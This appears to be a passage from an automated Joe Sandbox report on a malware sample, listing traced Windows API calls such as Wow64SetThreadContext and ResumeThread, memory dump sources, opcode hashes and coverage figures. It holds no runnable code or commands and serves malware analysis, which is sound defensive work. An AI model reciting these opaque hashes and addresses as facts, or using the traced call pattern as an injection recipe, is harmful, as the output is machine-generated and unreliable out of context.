                                                                                                    • API String ID: 4275171209-0

                                                                                                    Control-flow Graph (figure not reproduced; legend: Executed / Not Executed; first block 1be598-1be600, calls Wow64SetThreadContext)
                                                                                                    APIs
                                                                                                    • Wow64SetThreadContext.KERNEL32(?,?), ref: 001BE64F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.373966133.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_1b0000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ContextThreadWow64
                                                                                                    • String ID:
                                                                                                    • API String ID: 983334009-0

                                                                                                    Control-flow Graph (figure not reproduced; legend: Executed / Not Executed; first block 1be5a0-1be600, calls Wow64SetThreadContext)
                                                                                                    APIs
                                                                                                    • Wow64SetThreadContext.KERNEL32(?,?), ref: 001BE64F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.373966133.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_1b0000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ContextThreadWow64
                                                                                                    • String ID:
                                                                                                    • API String ID: 983334009-0

                                                                                                    Control-flow Graph (figure not reproduced; legend: Executed / Not Executed; first block 1be4a8-1be544, calls ResumeThread)
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.373966133.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_1b0000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ResumeThread
                                                                                                    • String ID:
                                                                                                    • API String ID: 947044025-0

                                                                                                    Control-flow Graph (figure not reproduced; legend: Executed / Not Executed; first block 1be4b0-1be544, calls ResumeThread)
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.373966133.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_1b0000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ResumeThread
                                                                                                    • String ID:
                                                                                                    • API String ID: 947044025-0

                                                                                                    Control-flow Graph (figure not reproduced; legend: Executed / Not Executed; first block ca193e-ca193f)
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.376283756.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_ca0000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: G4MJ
                                                                                                    • API String ID: 0-3610995474
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.376283756.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_ca0000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a213a56d56dbf092a0584e6e816f79b221aff175cf140c3fa69d957685b704ca
                                                                                                    • Instruction ID: d783dd88c542d56152d57f44b632add89cb57c3a5c9d2d589a2c71fa061a9289
                                                                                                    • Opcode Fuzzy Hash: a213a56d56dbf092a0584e6e816f79b221aff175cf140c3fa69d957685b704ca
                                                                                                    • Instruction Fuzzy Hash: 0151BE74E042098FDF04DFE5D9546ADBBB2FF8A300F208229E81AAB355DB305942DF51
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.376283756.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_ca0000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: de4f1ad894a9ad472ada60896b58fc96659f54057526b2677dfd2bad3662d659
                                                                                                    • Instruction ID: 005aa0740e05f9714e0431aa90ca2df929bead7b3230d861f10708a9aeea2496
                                                                                                    • Opcode Fuzzy Hash: de4f1ad894a9ad472ada60896b58fc96659f54057526b2677dfd2bad3662d659
                                                                                                    • Instruction Fuzzy Hash: CF419F74E042098FDF04DFE4D954AAEBBB2EF8A300F208229D819BB355DB345941DF51
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.376283756.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_ca0000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 47d8078a3277f167ce9c71a5455d1a6fde963ce16a9bef0747855c8eec094550
                                                                                                    • Instruction ID: 349a306e3f5519cfa5d215c1798b827df97b323c812745c23b925060c1e39c8a
                                                                                                    • Opcode Fuzzy Hash: 47d8078a3277f167ce9c71a5455d1a6fde963ce16a9bef0747855c8eec094550
                                                                                                    • Instruction Fuzzy Hash: AB413771D4522ACBDB20CF65CC40BE8B7B5BF8A314F2492EAD509A7251EB705AC5DF40
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.376283756.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_ca0000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 766d8f4b09d2a5f3e7e38186c52f6842613f2612b5bd3f4caf0c55b0a6aaca6a
                                                                                                    • Instruction ID: b60e7aa4866ae3611c7dbdebf66793e4b11a85e71ed65b42f8831b6a92c504b2
                                                                                                    • Opcode Fuzzy Hash: 766d8f4b09d2a5f3e7e38186c52f6842613f2612b5bd3f4caf0c55b0a6aaca6a
                                                                                                    • Instruction Fuzzy Hash: 1521AF30D09204CBCB04DFA5D9445EDBBB9EF8F351F24A129D40AB3661DB300806DF29
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.370913574.000000000015D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0015D000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_15d000_ekte.jbxd
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.370977757.000000000016D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0016D000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_16d000_ekte.jbxd
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.376283756.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_ca0000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 5a0fe736fdda38b14f49d7bed0c3af46d7156da81ed168f14b4d5ec697b215c3
                                                                                                    • Instruction ID: 01dbd219a13a4bbd80d4117746fe97215a89bb40f4c097ab49366856676aceb5
                                                                                                    • Opcode Fuzzy Hash: 5a0fe736fdda38b14f49d7bed0c3af46d7156da81ed168f14b4d5ec697b215c3
                                                                                                    • Instruction Fuzzy Hash: CA11EEB4D0920ADFCB44DFAAC9446AEFBF5AB89300F24956AC819A3350E7345A01DF90
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.376283756.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_ca0000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 04c3bcc4f224935e7f3d38b453a52c5f9a872ab7a9b4510957f52f54dd9707da
                                                                                                    • Instruction ID: 6e5464e7dc26c33724c0df8decb9b1a56d1b2c41688df0711efaa4e7f600fdcc
                                                                                                    • Opcode Fuzzy Hash: 04c3bcc4f224935e7f3d38b453a52c5f9a872ab7a9b4510957f52f54dd9707da
                                                                                                    • Instruction Fuzzy Hash: C011F3B4D0924ACFCB40DFA9D9445ADBFB5AF8A300F2491AAC809E3291E7345A40DF91
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.376283756.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_ca0000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c0f11eb55aef92ecbd6ce413199652ff77d8154a5486f59268c1f4b888cb93c8
                                                                                                    • Instruction ID: 0d885ae815213d775be0bfccf3378231658c2b4a3edb544d404f697bdb372e74
                                                                                                    • Opcode Fuzzy Hash: c0f11eb55aef92ecbd6ce413199652ff77d8154a5486f59268c1f4b888cb93c8
                                                                                                    • Instruction Fuzzy Hash: 30011675D092089BDB08CFAAD8545EDBBFAABCE340F20D02AE819B7354DB7018019F54
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.376283756.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_ca0000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b0e97e9ca6416951c048560f27b5f967de5da978d1f6596749b37b427dff0ce2
                                                                                                    • Instruction ID: 13bf5b6ab2b0e0768b93bd26159e57ef1597c12b8209d2026749d1640a094c9e
                                                                                                    • Opcode Fuzzy Hash: b0e97e9ca6416951c048560f27b5f967de5da978d1f6596749b37b427dff0ce2
                                                                                                    • Instruction Fuzzy Hash: 0A11B035909228DFDB60CF64CD90FE9BBB6EB0A315F1480C9E909A7291C7329E81DF40
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.376283756.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_ca0000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 310a6b42dce9869b4acffdf5cd3078ab83ff10749ba3a98671dfc0fedf7123ad
                                                                                                    • Instruction ID: e6297f396b2a8d6e6330690a43fd2a4c6fbfec3bb2fe2062e286b91571004ee1
                                                                                                    • Opcode Fuzzy Hash: 310a6b42dce9869b4acffdf5cd3078ab83ff10749ba3a98671dfc0fedf7123ad
                                                                                                    • Instruction Fuzzy Hash: 05F06D30D0E2489FCB05DFB9D9545ACBFF4AB8B300F1892DEC80AA32A1D6340A48DF01
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.376283756.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_ca0000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 0fe832815b905158174d6ff993b90551669ce76944e89e026f9ec09758bcdb2d
                                                                                                    • Instruction ID: e57356d5cc5e8743bfc07fd30a73345575ed4dcd1514f8dcbc5f1593b38e5107
                                                                                                    • Opcode Fuzzy Hash: 0fe832815b905158174d6ff993b90551669ce76944e89e026f9ec09758bcdb2d
                                                                                                    • Instruction Fuzzy Hash: 3001AD74A4A385CFCB01CBE0D8946EC7FB4EF06344F241095E809AE286D2740906DB00
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.376283756.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_ca0000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 67abfda47bc5d349b89dffee41821b13b7203c2b577cd8af182ec4e469fb427c
                                                                                                    • Instruction ID: a75bd25e0365488cb46eec385dfafee64aab4bafe1d982776872be7cb1589553
                                                                                                    • Opcode Fuzzy Hash: 67abfda47bc5d349b89dffee41821b13b7203c2b577cd8af182ec4e469fb427c
                                                                                                    • Instruction Fuzzy Hash: 7B0112789092688FCB11CFA4CC907ECBBF5BB4A304F24909AD509A7252D7305A85DF00
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.376283756.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_ca0000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: db803992b6f0e0cd9ef4218668592d6ef311d793320c330e9ba7b9ae4e2ba55d
                                                                                                    • Instruction ID: a4bbb4d82b83af4563f43d4d2e0a1bcea99d9f857363a650114a1479b4615ed6
                                                                                                    • Opcode Fuzzy Hash: db803992b6f0e0cd9ef4218668592d6ef311d793320c330e9ba7b9ae4e2ba55d
                                                                                                    • Instruction Fuzzy Hash: 77F04F3580936ACFCB11CF15DD487E8BBB5AB8B319F1451DA880966396C7344E85DF00
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.376283756.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_ca0000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d4be036b5eb446935ae6268a6eba6e1b000bb1a69d97edbe651ae93f0eaf6d98
                                                                                                    • Instruction ID: 402acca9b6e201e34a844fbdccfcd5c9d3764852221f68d064d6fa3b177e02e6
                                                                                                    • Opcode Fuzzy Hash: d4be036b5eb446935ae6268a6eba6e1b000bb1a69d97edbe651ae93f0eaf6d98
                                                                                                    • Instruction Fuzzy Hash: F9F03C34809118CFDB50CF64C885BE8B7B8EB0A304F2440D9D40EA7252CB355A85DF50
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.376283756.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_ca0000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 6b46a4b4fe495d6c49a851ad878368ea6a5e76cda3c32fa07cdd1ad88ba38e20
                                                                                                    • Instruction ID: c32118820868d4d83b9d578e79946a8134b75fd2456bb02335e1722d2bc0b24b
                                                                                                    • Opcode Fuzzy Hash: 6b46a4b4fe495d6c49a851ad878368ea6a5e76cda3c32fa07cdd1ad88ba38e20
                                                                                                    • Instruction Fuzzy Hash: 48F01C3490A2989FCB11DFA8D55159DBFB0EF4A301F2441DAD841D7361C6314A49DB41
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.376283756.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_ca0000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 00b189af554eacec75e5db5cf9c6386af6c52a7109862ea7c14406ac30628228
                                                                                                    • Instruction ID: 3b19336d31a7ac3b2faace5b44987fd0938f50d8661532b50399ab50cf4c5d88
                                                                                                    • Opcode Fuzzy Hash: 00b189af554eacec75e5db5cf9c6386af6c52a7109862ea7c14406ac30628228
                                                                                                    • Instruction Fuzzy Hash: 7FE0223088F288DFC711CBB899610ACBF749F47304F2802CEC848A3293C6302949EB12
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.376283756.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_ca0000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b6db9b60eee3e64743089bbd8f16cbaa881770d922a3d443207932d1bb306b27
                                                                                                    • Instruction ID: 44fb551df2b394d790ee0786c4b82c4f8252fd09569c774fde52abff3345b550
                                                                                                    • Opcode Fuzzy Hash: b6db9b60eee3e64743089bbd8f16cbaa881770d922a3d443207932d1bb306b27
                                                                                                    • Instruction Fuzzy Hash: D4F03978919258DFCB41DFB8D99468C7FB0AF4A310F2442DED904D7361E6328A58CB11
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.376283756.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_ca0000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ea02da902e423b57d1522665433aa7aa7997a5b6b417307b398415a9557d3810
                                                                                                    • Instruction ID: 62c7e3448ee0190e22e53df3f894f1f033a38e1887494ee9c6712f499fe7d9fc
                                                                                                    • Opcode Fuzzy Hash: ea02da902e423b57d1522665433aa7aa7997a5b6b417307b398415a9557d3810
                                                                                                    • Instruction Fuzzy Hash: 28F01735904228DFDB51CF94C8447ECBBB5EB4A314F2440D99009A3251CB315A81EF00
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.376283756.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_ca0000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: cfae47ed198dd4afe1deae3dade5caa56820d0547f22be778aa585a25fad94ec
                                                                                                    • Instruction ID: 90bd4b050a9a3f51ae1b941404d6b4d778c86d5b7c804f910575c2f03c442937
                                                                                                    • Opcode Fuzzy Hash: cfae47ed198dd4afe1deae3dade5caa56820d0547f22be778aa585a25fad94ec
                                                                                                    • Instruction Fuzzy Hash: 9EF08275804155CFCB20CF64C9845E8BBB5FB95314F1442DAC40D97392D7345E82DF10
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.376283756.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_ca0000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 2a17aa2762d3d803651c258f3f8741299c516a9d55740b06ab7ec4e137e8ae7f
                                                                                                    • Instruction ID: 77c4ca7e701d4998fbed64f8f73a17fe569987f28f3226a3797885f5de3556d7
                                                                                                    • Opcode Fuzzy Hash: 2a17aa2762d3d803651c258f3f8741299c516a9d55740b06ab7ec4e137e8ae7f
                                                                                                    • Instruction Fuzzy Hash: A6E06D3080E284DFCB259FA4A5602EC7F70AF87348F7411DDC44467252D3310A49EB11
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.376283756.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_ca0000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: eee67d571e0ca8da0db15db16d7815269538935bb65991a1bd7678892a5fa06d
                                                                                                    • Instruction ID: 6f225454aac9e80a3910b36a2030d2c4a40dd321776e2a37b1ca1450f0c45dae
                                                                                                    • Opcode Fuzzy Hash: eee67d571e0ca8da0db15db16d7815269538935bb65991a1bd7678892a5fa06d
                                                                                                    • Instruction Fuzzy Hash: 98E065309092998FCB05DFB8D89828CBFB0EB8A300F2401EEC484EB251E2301A48D741
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.376283756.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_ca0000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.373966133.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_1b0000_ekte.jbxd
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.376283756.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_ca0000_ekte.jbxd

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:1.5%
                                                                                                    Dynamic/Decrypted Code Coverage:3.6%
                                                                                                    Signature Coverage:5.8%
                                                                                                    Total number of Nodes:137
                                                                                                    Total number of Limit Nodes:11

                                                                                                    Control-flow Graph

                                                                                                    control_flow_graph 234 42c483-42c4bf call 404783 call 42d6c3 NtClose
                                                                                                    APIs
                                                                                                    • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C4BA
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.417743791.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_400000_ekte.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Close
                                                                                                    • String ID:
                                                                                                    • API String ID: 3535843008-0
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.418645615.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000990000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A80000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A90000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A94000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A97000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000AA0000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000B00000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_990000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0

                                                                                                    Control-flow Graph

                                                                                                    control_flow_graph 244 9af9f0-9afa05 LdrInitializeThunk
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.418645615.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000990000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A80000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A90000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A94000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A97000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000AA0000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000B00000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_990000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0

                                                                                                    Control-flow Graph

                                                                                                    control_flow_graph 245 9afae8-9afafd LdrInitializeThunk
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.418645615.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000990000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A80000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A90000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A94000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A97000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000AA0000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000B00000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_990000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 246 9afb68-9afb7d LdrInitializeThunk
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.418645615.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000990000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A80000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A90000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A94000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A97000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000AA0000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000B00000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_990000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.418645615.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000990000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A80000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A90000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A94000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A97000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000AA0000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000B00000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
